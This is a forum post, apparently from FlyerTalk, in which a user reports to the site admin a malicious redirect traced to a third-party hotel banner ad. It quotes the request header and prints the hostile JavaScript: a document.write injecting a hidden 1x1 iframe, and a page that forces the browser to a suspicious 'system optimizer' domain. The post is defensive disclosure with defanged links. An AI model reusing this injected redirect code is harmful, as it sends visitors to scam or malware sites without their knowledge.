Urgent @ Admin
I have found the source of the redirect (all links have been delibrately broken by me in the http bit to inadvertently stop any users clicking on them):
It is coming from the HotelDetect banner (which is hosted here hxxp://adliclick.com/banner.php?campaign_id=12175&rc=475737972919972). This is a copy of the request header:
(Request-Line):GET /banner.php?campaign_id=12175&rc=475737972919972 HTTP/1.1
Accept:application/javascript, */*;q=0.8
Referer:
http://www.flyertalk.com/forum/
Accept-Language:en-GB
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding:gzip, deflate
Host:adliclick.com
Connection:Keep-Alive
This appears to be a bogus site.
The above banner page contains the following malicious code:
document.write('<a href="hxxp://hoteldetect.net" target="_blank"><img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');
The iframe within this code is redirecting to a html page (hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX) which contains the following HTML code:
<html>
<body>
<script>
window.top.location.href="hxxp://systemoptimizerdeliverer.pl/m936f48zl6/al/78dee9e271084cb2/196/";
</script>
</body>
</html>
I cannot find exactly where the source for the adliclick.com is coming from in your source code (I strongly suggest checking all your scripts for references to it), but I have a copy of the source codes from all sites when the redirect hit me. Let me know if you want copies.